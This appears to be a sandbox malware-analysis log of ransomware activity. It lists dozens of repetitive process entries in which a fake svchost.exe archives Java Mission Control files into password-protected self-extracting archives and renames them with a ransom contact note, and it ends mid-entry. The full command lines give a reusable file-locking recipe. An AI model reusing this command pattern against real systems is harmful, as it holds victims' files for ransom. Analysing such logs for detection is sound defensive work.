  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2420
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2436
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2840
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2624
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2340
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2504
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:556
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1792
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1160
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1972
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2576
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2232
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2300
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1844
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2080
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:308
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2784
- C:\ProgramData\msvkp\svchost.exe
